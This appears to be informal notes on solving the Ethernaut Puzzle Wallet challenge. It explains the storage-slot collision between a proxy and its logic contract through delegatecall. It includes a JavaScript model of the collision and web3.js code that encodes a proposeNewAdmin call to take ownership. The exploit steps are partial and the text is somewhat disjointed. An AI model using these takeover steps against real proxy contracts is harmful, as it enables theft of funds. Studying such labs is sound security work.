✅ Note the storage slot layout when using delegatecall

To do so, they voted and assigned two people with special roles in the system:

DelegateCall

The vulnerability here arises from a storage collision between the proxy contract (PuzzleProxy) and the logic contract (PuzzleWallet). Storage collisions are a nightmare when using delegatecall.

So it had already happened before the delegate call, I guess.
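To make the collision described above concrete, here is an added JavaScript model (not code from these notes or from the Ethernaut level). It lists the slots that PuzzleProxy and PuzzleWallet declare differently, then reads and writes one shared storage array through both layouts. The layouts are assumed to follow the level's declaration order (`pendingAdmin` and the two mappings do not appear on this page); `findCollisions`, `makeView`, `demo` and the player address are constructed for illustration.

```javascript
// Storage layouts in declaration order, one variable per 32-byte slot
// (holds for these two contracts; packed layouts would need byte offsets).
const PROXY_LAYOUT = [ // PuzzleProxy (assumed declaration order)
  { name: 'pendingAdmin', type: 'address' },
  { name: 'admin', type: 'address' },
];
const WALLET_LAYOUT = [ // PuzzleWallet (assumed declaration order)
  { name: 'owner', type: 'address' },
  { name: 'maxBalance', type: 'uint256' },
  { name: 'whitelisted', type: 'mapping(address => bool)' },
  { name: 'balances', type: 'mapping(address => uint256)' },
];

// Audit check: list every shared slot the two contracts declare differently.
function findCollisions(proxy, logic) {
  const found = [];
  for (let slot = 0; slot < Math.min(proxy.length, logic.length); slot++) {
    const p = proxy[slot], l = logic[slot];
    if (p.name !== l.name || p.type !== l.type) {
      found.push({ slot, proxy: p.name, logic: l.name, sameType: p.type === l.type });
    }
  }
  return found;
}

// A view resolves variable names to slot numbers for one layout. Two views over
// ONE slots array model delegatecall: logic code runs on the proxy's storage.
function makeView(slots, layout) {
  const slotOf = (name) => {
    const i = layout.findIndex((v) => v.name === name);
    if (i < 0) throw new Error(`unknown variable: ${name}`);
    return i;
  };
  return {
    read: (name) => slots[slotOf(name)] ?? 0n, // unset storage reads as zero
    write: (name, value) => { slots[slotOf(name)] = BigInt(value); },
  };
}

function demo() {
  const slots = [];
  const proxy = makeView(slots, PROXY_LAYOUT);
  const wallet = makeView(slots, WALLET_LAYOUT);
  const PLAYER = 0x1111111111111111111111111111111111111111n; // constructed address
  proxy.write('pendingAdmin', PLAYER); // the store proposeNewAdmin performs
  const ownerSeenByWallet = wallet.read('owner');
  wallet.write('maxBalance', 12345n); // the store setMaxBalance performs
  return { ownerSeenByWallet, adminSeenByProxy: proxy.read('admin'), PLAYER };
}
console.log(findCollisions(PROXY_LAYOUT, WALLET_LAYOUT), demo());
```

A layout check like `findCollisions` belongs in review of any proxy/logic pair: every slot it reports is state that one contract can overwrite under the other's name.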

Although the web3.js API of the provided contract instance doesn't expose the proposeNewAdmin method, we can always encode the function call ourselves and send it to the contract as a transaction:

    // ABI description of the function to call
    const functionJson = {
        name: 'proposeNewAdmin',
        type: 'function',
        inputs: [
            {
                type: 'address',   // argument type
                name: '_newAdmin'  // argument name
            }
        ]
    };

    const params = [player]; // to change the owner to player

    // Encode the function selector plus arguments, then send the raw calldata
    const data = web3.eth.abi.encodeFunctionCall(functionJson, params);
    await web3.eth.sendTransaction({from: player, to: instance, data});

Reference examples for the web3.js calls:

    // General form
    web3.eth.abi.encodeFunctionCall(jsonInterface, parameters);

    // Example with two arguments
    web3.eth.abi.encodeFunctionCall({
        name: 'myMethod',
        type: 'function',
        inputs: [{
            type: 'uint256',
            name: 'myNumber'
        },{
            type: 'string',
            name: 'myString'
        }]
    }, ['2345675643', 'Hello!%']); // arguments

    // The variant that takes an account password is web3.eth.personal.sendTransaction
    web3.eth.personal.sendTransaction({
        from: "0xEB014f8c8B418Db6b45774c326A0E64C78914dC0",
        gasPrice: "20000000000",
        gas: "21000",
        to: '0x3535353535353535353535353535353535353535',
        value: "1000000000000000000",
        data: ""
    }, 'MyPassword!').then(console.log);
    > '0xda3be87732110de6c1354c83770aae630ede9ac308d9f7b399ecfba23d923384'

I want to change admin!

maxBalance corresponds to it, so changing that is enough.

But init requires some conditions to be met.

    function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted {
      require(address(this).balance == 0, "Contract balance is not 0");
      maxBalance = _maxBalance;
    }

----------------------------------------------
await getBalance(contract.address)
// Output: 0.001

How to reduce the balance of the address?